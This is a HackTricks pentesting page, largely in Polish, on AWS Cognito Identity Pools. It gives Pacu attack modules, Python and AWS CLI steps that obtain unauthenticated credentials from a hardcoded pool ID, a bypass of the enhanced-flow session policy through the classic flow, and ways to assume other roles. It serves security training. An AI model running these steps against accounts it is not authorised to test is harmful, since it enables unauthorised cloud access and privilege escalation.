Cognito Identity Pools

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Pule tożsamości odgrywają kluczową rolę, umożliwiając użytkownikom uzyskanie tymczasowych poświadczeń. Poświadczenia te są niezbędne do uzyskania dostępu do różnych usług AWS, w tym między innymi Amazon S3 i DynamoDB. Ciekawą cechą pul tożsamości jest ich wsparcie zarówno dla anonimowych użytkowników gości, jak i dla różnych dostawców tożsamości do uwierzytelniania użytkowników. Obsługiwani dostawcy tożsamości obejmują:

pule użytkowników Amazon Cognito
opcje logowania społecznościowego, takie jak Facebook, Google, Logowanie z Amazon i Logowanie z Apple
dostawcy zgodni z OpenID Connect (OIDC)
dostawcy tożsamości SAML (Security Assertion Markup Language)
tożsamości uwierzytelniane przez dewelopera

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Aby wygenerować sesje Identity Pool, najpierw musisz wygenerować Identity ID. Ten Identity ID jest identyfikacją sesji tego użytkownika. Te identyfikacje mogą mieć do 20 zbiorów danych, które mogą przechowywać do 1MB par klucz-wartość.

To jest przydatne do przechowywania informacji o użytkowniku (który zawsze będzie używał tego samego Identity ID).

Ponadto, usługa cognito-sync to usługa, która pozwala na zarządzanie i synchronizowanie tych informacji (w zbiorach danych, wysyłając informacje w strumieniach i wiadomościach SNS...).

Tools for pentesting

Pacu, framework do eksploatacji AWS, teraz zawiera moduły "cognito__enum" i "cognito__attack", które automatyzują enumerację wszystkich zasobów Cognito w koncie i oznaczają słabe konfiguracje, atrybuty użytkowników używane do kontroli dostępu itp., a także automatyzują tworzenie użytkowników (w tym wsparcie MFA) i eskalację uprawnień na podstawie modyfikowalnych atrybutów niestandardowych, używalnych poświadczeń puli tożsamości, ról, które można przyjąć w tokenach id itp.

Aby uzyskać opis funkcji modułów, zobacz część 2 postu na blogu. Aby uzyskać instrukcje instalacji, zobacz główną stronę Pacu.

Usage

Przykład użycia cognito__attack do próby tworzenia użytkowników i wszystkich wektorów eskalacji uprawnień przeciwko danej puli tożsamości i klientowi puli użytkowników:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Przykładowe użycie cognito__enum do zebrania wszystkich pul użytkowników, klientów pul użytkowników, pul tożsamości, użytkowników itp. widocznych w bieżącym koncie AWS:

Pacu (new:test) > run cognito__enum

Cognito Scanner to narzędzie CLI w Pythonie, które implementuje różne ataki na Cognito, w tym niechciane tworzenie kont i eskalację puli tożsamości.

Instalacja

$ pip install cognito-scanner

Użycie

$ cognito-scanner --help

For more information check https://github.com/padok-team/cognito-scanner

Accessing IAM Roles

Unauthenticated

Jedyną rzeczą, którą atakujący musi wiedzieć, aby uzyskać dane uwierzytelniające AWS w aplikacji Cognito jako użytkownik nieautoryzowany, jest ID puli tożsamości, a to ID musi być zakodowane na stałe w aplikacji webowej/mobilnej, aby mogła z niego korzystać. ID wygląda tak: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (nie można go złamać metodą brute force).

Domyślnie nieautoryzowana rola IAM Cognito utworzona przez nazywa się Cognito_<Nazwa puli tożsamości>Unauth_Role

Jeśli znajdziesz ID puli tożsamości zakodowane na stałe i pozwala ono na dostęp użytkownikom nieautoryzowanym, możesz uzyskać dane uwierzytelniające AWS za pomocą:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

Lub możesz użyć następujących aws cli commands:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Zauważ, że domyślnie nieautoryzowany użytkownik cognito NIE MOŻE mieć żadnych uprawnień, nawet jeśli zostały przypisane za pomocą polityki. Sprawdź następną sekcję.

Ulepszony vs Podstawowy przepływ uwierzytelniania

Poprzednia sekcja dotyczyła domyślnego ulepszonego przepływu uwierzytelniania. Ten przepływ ustawia ograniczającą politykę sesji dla wygenerowanej sesji roli IAM. Ta polityka pozwoli tylko na korzystanie z usług z tej listy (nawet jeśli rola miała dostęp do innych usług).

Jednak istnieje sposób, aby to obejść, jeśli pula tożsamości ma włączony "Podstawowy (Klasyczny) Przepływ", użytkownik będzie mógł uzyskać sesję korzystając z tego przepływu, która nie będzie miała tej ograniczającej polityki sesji.

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

Jeśli otrzymasz ten błąd, to dlatego, że podstawowy przepływ nie jest włączony (domyślnie)

Wystąpił błąd (InvalidParameterException) podczas wywoływania operacji GetOpenIdToken: Podstawowy (klasyczny) przepływ nie jest włączony, proszę użyć rozszerzonego przepływu.

Mając zestaw poświadczeń IAM, powinieneś sprawdzić jakie masz uprawnienia i spróbować podnieść uprawnienia.

Uwierzytelniony

Pamiętaj, że uwierzytelnieni użytkownicy mogą mieć inne uprawnienia, więc jeśli możesz zarejestrować się w aplikacji, spróbuj to zrobić i uzyskaj nowe poświadczenia.

Mogą być również dostępne role dla uwierzytelnionych użytkowników uzyskujących dostęp do Identity Pool.

W tym celu możesz potrzebować dostępu do dostawcy tożsamości. Jeśli jest to Cognito User Pool, być może możesz wykorzystać domyślne zachowanie i samodzielnie utworzyć nowego użytkownika.

IAM Cognito uwierzytelniona rola utworzona przez domyślnie nazywa się Cognito_<Nazwa Identity Pool>Auth_Role

W każdym razie, następny przykład zakłada, że już zalogowałeś się w Cognito User Pool używanym do uzyskania dostępu do Identity Pool (nie zapomnij, że inne typy dostawców tożsamości mogą być również skonfigurowane).

aws cognito-identity get-id \
--identity-pool-id <identity_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# Uzyskaj identity_id z odpowiedzi poprzedniego polecenia
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>


# W IdToken możesz znaleźć role, do których użytkownik ma dostęp dzięki grupom User Pool
# Użyj --custom-role-arn, aby uzyskać poświadczenia do konkretnej roli
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
    --custom-role-arn <role_arn> \
    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

Możliwe jest konfigurowanie różnych ról IAM w zależności od dostawcy tożsamości, z którego użytkownik się loguje, lub nawet w zależności od użytkownika (używając roszczeń). Dlatego, jeśli masz dostęp do różnych użytkowników przez tego samego lub różnych dostawców, może być warto zalogować się i uzyskać dostęp do ról IAM wszystkich z nich.

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

PreviousAWS - Cognito Enum NextCognito User Pools

Last updated 1 month ago